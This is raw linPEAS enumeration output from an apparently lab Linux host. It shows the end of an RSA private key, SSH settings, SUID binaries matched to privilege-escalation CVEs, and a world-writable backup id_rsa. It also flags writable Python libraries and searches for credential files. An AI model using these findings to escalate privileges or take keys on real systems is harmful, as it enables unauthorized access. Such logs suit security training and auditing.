KZEByFOQE8nmuwbXE8HUa/cq9J936c8Kl/hvbMf6kDSyhJozOeJd5aqbqT7Kb6zA
ELkU10cUUB4qGGo5JF7OHeiSAwmcBtdm/qfywIWibUpJaf3JeEQGUn3INMPtV8j4
4gQbAoGBAKuXPITKuO7SsRfXcwB3MO3iCTLdW7BYnYF1SzVbPBonmcsxlQinvoRg
2faWmSFAUK6cIys9za3pzOw3FP8W9Q5SGsA9KriSYj6/h7ei9GeJAr3mxlbGnkZN
ZFqUVe2Jvxq++O6Ub41zUtWINbR5Fxf+kTlJIIwqc6IuzZq+QWXy
-----END RSA PRIVATE KEY-----



-rw-rw-r-- 1 jack jack 391 Jan 10  2020 /home/jack/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDF8FH0X1Xkbaye/VdprG/dUdsVnZVlHAbJT5qHqSiYF5oCV2vxI0rXHTC795eMuOtadVpg4RTZhSsfOf924Hda+bzHIDRPzH9ZtXaixZpU5p+Q9K9ilXg51Ct1GhLc8Q5dGdL4Kc5MCA9ajb7F8fVd6V0XD1eJiumtO6CbAJxgO4FkHevOZYDyw9aMuOzrHM0rbpFBBuj3NrHB8R2Nndqf0meAknubSu0X28p4JF87VXyx3+3WW73oqqfgVlRNdAUQZ8Bi6kbpve+lHCqYjrLZWMrkzGUyYR3A/yjGYpHhdGq9IrXyblvLPxlS7VF8HxSD+kor1VVuT1AVZutXgTcX jack@jack

Port 22
PermitRootLogin yes
PubkeyAuthentication yes
PermitEmptyPasswords no
ChallengeResponseAuthentication no
UsePAM yes

══╣ Possible private SSH keys were found!
/home/jack/.config/lxc/client.key
/home/jack/.ssh/id_rsa

══╣ Some certificates were found (out limited):
/home/jack/.config/lxc/client.crt
20307PSTORAGE_CERTSBIN

./linpeas.sh: 2779: ./linpeas.sh: gpg-connect-agent: not found
══╣ Some home ssh config file was found
/usr/share/doc/openssh-client/examples/sshd_config
AuthorizedKeysFile	.ssh/authorized_keys
Subsystem	sftp	/usr/lib/openssh/sftp-server

══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow


Searching inside /etc/ssh/ssh_config for interesting info
Host *
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes
    GSSAPIDelegateCredentials no

╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Jan  8  2020 /etc/pam.d
-rw-r--r-- 1 root root 2133 Jan 31  2019 /etc/pam.d/sshd




╔══════════╣ Searching tmux sessions
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-sessions
tmux 2.1


/tmp/tmux-1000
╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 4096 Jan  8  2020 /usr/share/keyrings
drwxr-xr-x 2 root root 4096 Jan  8  2020 /var/lib/apt/keyrings




╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd

╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found

-rw-r--r-- 1 root root 12255 Feb 26  2019 /etc/apt/trusted.gpg
-rw------- 1 jack jack 0 Jan 18 14:53 /home/jack/.gnupg/pubring.gpg
-rw------- 1 jack jack 40 Jan 18 14:53 /home/jack/.gnupg/trustdb.gpg
-rw-r--r-- 1 root root 12335 May 18  2012 /usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 0 May 18  2012 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 2294 Nov 11  2013 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Nov 11  2013 /usr/share/keyrings/ubuntu-cloudimage-keyring-removed.gpg
-rw-r--r-- 1 root root 2253 Nov  5  2017 /usr/share/keyrings/ubuntu-esm-keyring.gpg
-rw-r--r-- 1 root root 1139 Nov  5  2017 /usr/share/keyrings/ubuntu-fips-keyring.gpg
-rw-r--r-- 1 root root 1227 May 18  2012 /usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 2256 Feb 26  2016 /usr/share/popularity-contest/debian-popcon.gpg
-rw-r--r-- 1 root root 12335 Feb 26  2019 /var/lib/apt/keyrings/ubuntu-archive-keyring.gpg

drwx------ 2 jack jack 4096 Jan 18 14:53 /home/jack/.gnupg


╔══════════╣ Analyzing FTP Files (limit 70)


-rw-r--r-- 1 root root 69 Oct 24  2019 /etc/php/7.0/mods-available/ftp.ini
-rw-r--r-- 1 root root 69 Oct 24  2019 /usr/share/php7.0-common/common/ftp.ini






╔══════════╣ Analyzing Interesting logs Files (limit 70)
-rw-r----- 1 root adm 417698 Jan 18 15:16 /var/log/apache2/access.log

-rw-r----- 1 root adm 32020 Jan 18 14:49 /var/log/apache2/error.log
-rw-rw---- 1 mysql adm 5271 Jan  9  2020 /var/log/mysql/error.log

╔══════════╣ Analyzing Windows Files (limit 70)






















lrwxrwxrwx 1 root root 22 Jan  9  2020 /etc/alternatives/my.cnf -> /etc/mysql/mariadb.cnf
lrwxrwxrwx 1 root root 24 Jan  9  2020 /etc/mysql/my.cnf -> /etc/alternatives/my.cnf
-rw-r--r-- 1 root root 83 Jan  9  2020 /var/lib/dpkg/alternatives/my.cnf



























╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3771 Aug 31  2015 /etc/skel/.bashrc
-rw-r--r-- 1 jack jack 3771 Jan  8  2020 /home/jack/.bashrc





-rw-r--r-- 1 root root 655 May 16  2017 /etc/skel/.profile
-rw-r--r-- 1 jack jack 655 Jan  8  2020 /home/jack/.profile






                                         ╔═══════════════════╗
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
                                         ╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strings Not Found
-rwsr-sr-x 1 root root 97K Jan 29  2019 /usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 419K Jan 31  2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 39K Jun 14  2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 15K Jan 15  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-- 1 root messagebus 42K Jan 12  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10K Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 74K May 16  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 134K Jul  4  2017 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 53K May 16  2017 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 23K Jan 15  2019 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root 49K May 16  2017 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 39K May 16  2017 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 40K May 16  2017 /usr/bin/chsh
-rwsr-sr-x 1 daemon daemon 51K Jan 14  2016 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 33K May 16  2017 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 33K May 16  2017 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 31K Jul 12  2016 /bin/fusermount
-rwsr-xr-x 1 root root 44K May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 44K May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 27K May 16  2018 /bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 139K Jan 28  2017 /bin/ntfs-3g  --->  Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others(02-2017)
-rwsr-xr-x 1 root root 40K May 16  2018 /bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 40K May 16  2017 /bin/su

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-sr-x 1 root root 97K Jan 29  2019 /usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwxr-sr-x 1 root utmp 10K Mar 11  2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root shadow 61K May 16  2017 /usr/bin/chage
-rwxr-sr-x 1 root crontab 36K Apr  5  2016 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 23K May 16  2017 /usr/bin/expiry
-rwxr-sr-x 1 root tty 15K Mar  1  2016 /usr/bin/bsd-write
-rwxr-sr-x 1 root ssh 351K Jan 31  2019 /usr/bin/ssh-agent
-rwxr-sr-x 1 root utmp 425K Feb  7  2016 /usr/bin/screen  --->  GNU_Screen_4.5.0
-rwxr-sr-x 1 root mlocate 39K Nov 18  2014 /usr/bin/mlocate
-rwsr-sr-x 1 daemon daemon 51K Jan 14  2016 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwxr-sr-x 1 root tty 27K May 16  2018 /usr/bin/wall
-rwxr-sr-x 1 root shadow 35K Apr  9  2018 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 35K Apr  9  2018 /sbin/pam_extrausers_chkpwd

╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so
/etc/ld.so.conf
include /etc/ld.so.conf.d/*.conf

/etc/ld.so.conf.d
  /etc/ld.so.conf.d/libc.conf
/usr/local/lib
  /etc/ld.so.conf.d/x86_64-linux-gnu.conf
/lib/x86_64-linux-gnu
/usr/lib/x86_64-linux-gnu

╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
Current capabilities:
Current: =
CapInh:	0000000000000000
CapPrm:	0000000000000000
CapEff:	0000000000000000
CapBnd:	0000003fffffffff
CapAmb:	0000000000000000

Shell capabilities:
0x0000000000000000=
CapInh:	0000000000000000
CapPrm:	0000000000000000
CapEff:	0000000000000000
CapBnd:	0000003fffffffff
CapAmb:	0000000000000000

Files with capabilities (limited to 50):
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr = cap_net_raw+ep

╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
files with acls in searched folders Not Found

╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh

╔══════════╣ Unexpected in /opt (usually empty)
total 12
drwxr-xr-x  3 root root 4096 Jan 10  2020 .
drwxr-xr-x 23 root root 4096 Jan  8  2020 ..
drwxr-xr-x  2 root root 4096 Jan 10  2020 statuscheck

╔══════════╣ Unexpected in root
/initrd.img
/vmlinuz

╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files
total 24
drwxr-xr-x  2 root root 4096 Jan  8  2020 .
drwxr-xr-x 96 root root 4096 Jan 13  2020 ..
-rw-r--r--  1 root root  825 Jan 29  2019 apps-bin-path.sh
-rw-r--r--  1 root root  663 May 18  2016 bash_completion.sh
-rw-r--r--  1 root root 1003 Dec 29  2015 cedilla-portuguese.sh
-rw-r--r--  1 root root 1557 Apr 14  2016 Z97-byobu.sh

╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d

═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No

╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/home/jack/reminder.txt
/root/

╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
/home/jack
/sys/fs/cgroup/systemd/user.slice/user-1000.slice/user@1000.service
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1000.slice/user@1000.service

╔══════════╣ Readable files belonging to root and readable by me but not world readable
-rw-r----- 1 root adm 110390 Jan  9  2020 /var/log/apt/term.log
-rw-r----- 1 root adm 31 Feb 26  2019 /var/log/dmesg
-rw-r----- 1 root adm 417698 Jan 18 15:16 /var/log/apache2/access.log
-rw-r----- 1 root adm 32020 Jan 18 14:49 /var/log/apache2/error.log
-rw-r----- 1 root adm 0 Jan  9  2020 /var/log/apache2/other_vhosts_access.log
-rw-r----- 1 root adm 31 Feb 26  2019 /var/log/fsck/checkroot
-rw-r----- 1 root adm 31 Feb 26  2019 /var/log/fsck/checkfs

╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/opt/statuscheck/output.log
/var/log/wtmp
/var/log/lastlog
/var/log/auth.log
/var/log/apache2/access.log
/var/log/syslog

╔══════════╣ Writable log files (logrotten) (limit 100)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation

╔══════════╣ Files inside /home/jack (limit 20)
total 44
drwxr-xr-x 6 jack jack 4096 Jan 18 14:53 .
drwxr-xr-x 3 root root 4096 Jan  8  2020 ..
lrwxrwxrwx 1 jack jack    9 Jan 10  2020 .bash_history -> /dev/null
-rw-r--r-- 1 jack jack  220 Jan  8  2020 .bash_logout
-rw-r--r-- 1 jack jack 3771 Jan  8  2020 .bashrc
drwx------ 2 jack jack 4096 Jan  9  2020 .cache
drwxr-x--- 3 jack jack 4096 Jan 18 14:53 .config
drwx------ 2 jack jack 4096 Jan 18 14:53 .gnupg
-rw-r--r-- 1 jack jack  655 Jan  8  2020 .profile
-rw-r--r-- 1 root root  140 Jan 10  2020 reminder.txt
drwx------ 2 jack jack 4096 Jan 10  2020 .ssh
-rw-rw-r-- 1 jack jack   33 Jan 10  2020 user.txt

╔══════════╣ Files inside others home (limit 20)

╔══════════╣ Searching installed mail applications

╔══════════╣ Mails (limit 50)

╔══════════╣ Backup folders

╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 190591 Jan 16  2019 /usr/src/linux-headers-4.4.0-142-generic/.config.old
-rw-r--r-- 1 root root 0 Jan 16  2019 /usr/src/linux-headers-4.4.0-142-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 0 Jan 16  2019 /usr/src/linux-headers-4.4.0-142-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 7867 May  6  2015 /usr/share/doc/telnet/README.telnet.old.gz
-rw-r--r-- 1 root root 298768 Dec 29  2015 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 11358 Jan  9  2020 /usr/share/info/dir.old
-rwxr-xr-x 1 root root 226 Apr 14  2016 /usr/share/byobu/desktop/byobu.desktop.old
-rw-r--r-- 1 root root 665 Apr 16  2016 /usr/share/man/man8/vgcfgbackup.8.gz
-rw-r--r-- 1 root root 35792 May  8  2018 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so
-rw-r--r-- 1 root root 128 Jan  8  2020 /var/lib/sgml-base/supercatalog.old
-rw-r--r-- 1 root root 9070 Jan 16  2019 /lib/modules/4.4.0-142-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 9038 Jan 16  2019 /lib/modules/4.4.0-142-generic/kernel/drivers/power/wm831x_backup.ko
-rw-r--r-- 1 root root 610 Jan  8  2020 /etc/xml/catalog.old
-rw-r--r-- 1 root root 673 Jan  8  2020 /etc/xml/xml-core.xml.old

╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /var/lib/mlocate/mlocate.db: regular file, no read permission


╔══════════╣ Web files?(output limit)
/var/www/:
total 12K
drwxr-xr-x  3 root     root     4.0K Jan  9  2020 .
drwxr-xr-x 14 root     root     4.0K Jan  9  2020 ..
drwxrwsr-x  5 www-data www-data 4.0K Jan 10  2020 html

/var/www/html:
total 224K
drwxrwsr-x  5 www-data www-data 4.0K Jan 10  2020 .
drwxr-xr-x  3 root     root     4.0K Jan  9  2020 ..

╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-rw-r-- 1 www-data www-data 235 Jan 10  2020 /var/www/html/.htaccess
-rw-r--r-- 1 root root 0 Jan 18 14:49 /run/network/.ifstate.lock
-rw-r--r-- 1 jack jack 220 Jan  8  2020 /home/jack/.bash_logout
-rw------- 1 root root 0 Feb 26  2019 /etc/.pwd.lock
-rw-r--r-- 1 root root 220 Aug 31  2015 /etc/skel/.bash_logout
-rw-r--r-- 1 root root 1391 Jan  8  2020 /etc/apparmor.d/cache/.features

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rwxrwxr-x 1 jack jack 777018 Nov  8 12:58 /tmp/linpeas.sh
-rw-r--r-- 1 root root 11 Jan  8  2020 /var/backups/dpkg.arch.0
-rw-r--r-- 1 root root 713 Jan  8  2020 /var/backups/apt.extended_states.1.gz
-rw-r--r-- 1 root root 129487 Jan  8  2020 /var/backups/dpkg.status.1.gz
-rw-r--r-- 1 root root 129 Jan  8  2020 /var/backups/dpkg.statoverride.1.gz
-rw-r--r-- 1 root root 437 Jan  8  2020 /var/backups/dpkg.diversions.0
-rw-r--r-- 1 root root 207 Jan  9  2020 /var/backups/dpkg.statoverride.0
-rw-r--r-- 1 root root 552673 Jan  9  2020 /var/backups/dpkg.status.0
-rw-r--r-- 1 root root 43 Jan  8  2020 /var/backups/dpkg.arch.1.gz
-rw-r--r-- 1 root root 202 Jan  8  2020 /var/backups/dpkg.diversions.1.gz
-rw-r--r-- 1 root root 9931 Jan  9  2020 /var/backups/apt.extended_states.0
-rw-r--r-- 1 root root 40960 Jan  9  2020 /var/backups/alternatives.tar.0
-rwxrwxrwx 1 root root 1675 Jan 10  2020 /var/backups/id_rsa

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/home/jack
/run/lock
/run/user/1000
/run/user/1000/systemd
/tmp
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/linpeas.sh
/tmp/.Test-unix
/tmp/tmux-1000
#)You_can_write_even_more_files_inside_last_directory

/var/backups/id_rsa
/var/crash
/var/lib/lxcfs/cgroup/memory/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/init.scope/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/accounts-daemon.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/acpid.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/apache2.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/apparmor.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/apport.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/atd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/console-setup.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cron.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dbus.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-disk-byx2duuid-5aa0286cx2deea1x2d44e2x2db918x2d7041334f10a1.swap/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-mqueue.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-xvda5.swap/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/grub-common.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ifup@eth0.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/irqbalance.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/iscsid.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/keyboard-setup.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/kmod-static-nodes.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lvm2-monitor.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lxd-containers.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/mdadm.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/-.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/mysql.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/networking.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ondemand.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/open-iscsi.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/polkitd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/rc-local.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/resolvconf.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/rsyslog.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/run-user-1000.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/setvtrgb.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/snapd.seeded.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/snapd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ssh.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-fs-fuse-connections.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-journal-flush.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-modules-load.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-random-seed.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-remount-fs.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-sysctl.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-tmpfiles-setup-dev.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-tmpfiles-setup.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-udevd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-udev-trigger.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-update-utmp.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-user-sessions.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/system-serialx2dgetty.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ufw.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/unattended-upgrades.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/var-lib-lxcfs.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/user.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1000.slice/user@1000.service
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1000.slice/user@1000.service/cgroup.procs
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1000.slice/user@1000.service/init.scope
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1000.slice/user@1000.service/init.scope/cgroup.clone_children
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1000.slice/user@1000.service/init.scope/cgroup.procs
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1000.slice/user@1000.service/init.scope/notify_on_release
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1000.slice/user@1000.service/init.scope/tasks
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1000.slice/user@1000.service/tasks
/var/lib/php/sessions
/var/tmp

╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
  Group jack:
/tmp/linpeas.sh
  Group adm:
/var/log/mysql/error.log
  Group family:
/usr/lib/python2.7/_threading_local.py
/usr/lib/python2.7/plistlib.pyc
/usr/lib/python2.7/stringprep.py
/usr/lib/python2.7/ihooks.pyc
/usr/lib/python2.7/weakref.py
#)You_can_write_even_more_files_inside_last_directory

/etc/python2.7/sitecustomize.py

╔══════════╣ Searching passwords in history files

╔══════════╣ Searching passwords in config PHP files
		$pwd    = trim( wp_unslash( $_POST['pwd'] ) );

╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/bin/systemd-ask-password
/bin/systemd-tty-ask-password-agent
/etc/pam.d/common-password
/home/jack/.config/lxc/client.key
/usr/lib/git-core/git-credential
/usr/lib/git-core/git-credential-cache
/usr/lib/git-core/git-credential-cache--daemon
/usr/lib/git-core/git-credential-store
  #)There are more creds/passwds files in the previous parent folder

/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/share/dns/root.key
/usr/share/doc/git/contrib/credential
/usr/share/doc/git/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c
/usr/share/doc/git/contrib/credential/netrc/git-credential-netrc
/usr/share/doc/git/contrib/credential/osxkeychain/git-credential-osxkeychain.c
/usr/share/doc/git/contrib/credential/wincred/git-credential-wincred.c
/usr/share/locale-langpack/en_AU/LC_MESSAGES/ubuntuone-credentials.mo
/usr/share/locale-langpack/en_GB/LC_MESSAGES/ubuntuone-credentials.mo
/usr/share/man/man1/git-credential.1.gz
/usr/share/man/man1/git-credential-cache.1.gz
/usr/share/man/man1/git-credential-cache--daemon.1.gz
/usr/share/man/man1/git-credential-store.1.gz
  #)There are more creds/passwds files in the previous parent folder

/usr/share/man/man7/gitcredentials.7.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
  #)There are more creds/passwds files in the previous parent folder

/usr/share/pam/common-password.md5sums
/var/cache/debconf/passwords.dat
/var/lib/pam/password
/var/www/html/wp-admin/js/password-strength-meter.js
/var/www/html/wp-admin/js/password-strength-meter.min.js

╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs

╔══════════╣ Searching passwords inside logs (limit 70)
2019-02-26 23:58:11 configure base-passwd:amd64 3.5.39 3.5.39
2019-02-26 23:58:11 install base-passwd:amd64 <none> 3.5.39
2019-02-26 23:58:11 status half-configured base-passwd:amd64 3.5.39
2019-02-26 23:58:11 status half-installed base-passwd:amd64 3.5.39
2019-02-26 23:58:11 status installed base-passwd:amd64 3.5.39
2019-02-26 23:58:11 status unpacked base-passwd:amd64 3.5.39
2019-02-26 23:58:13 status half-configured base-passwd:amd64 3.5.39
2019-02-26 23:58:13 status half-installed base-passwd:amd64 3.5.39
2019-02-26 23:58:13 status unpacked base-passwd:amd64 3.5.39
2019-02-26 23:58:13 upgrade base-passwd:amd64 3.5.39 3.5.39
2019-02-26 23:58:19 install passwd:amd64 <none> 1:4.2-3.1ubuntu5
2019-02-26 23:58:19 status half-installed passwd:amd64 1:4.2-3.1ubuntu5
2019-02-26 23:58:19 status unpacked passwd:amd64 1:4.2-3.1ubuntu5
2019-02-26 23:58:22 configure base-passwd:amd64 3.5.39 <none>
2019-02-26 23:58:22 status half-configured base-passwd:amd64 3.5.39
2019-02-26 23:58:22 status installed base-passwd:amd64 3.5.39
2019-02-26 23:58:22 status unpacked base-passwd:amd64 3.5.39
2019-02-26 23:58:28 configure passwd:amd64 1:4.2-3.1ubuntu5 <none>
2019-02-26 23:58:28 status half-configured passwd:amd64 1:4.2-3.1ubuntu5
2019-02-26 23:58:28 status installed passwd:amd64 1:4.2-3.1ubuntu5
2019-02-26 23:58:28 status unpacked passwd:amd64 1:4.2-3.1ubuntu5
2019-02-26 23:59:08 status half-configured passwd:amd64 1:4.2-3.1ubuntu5
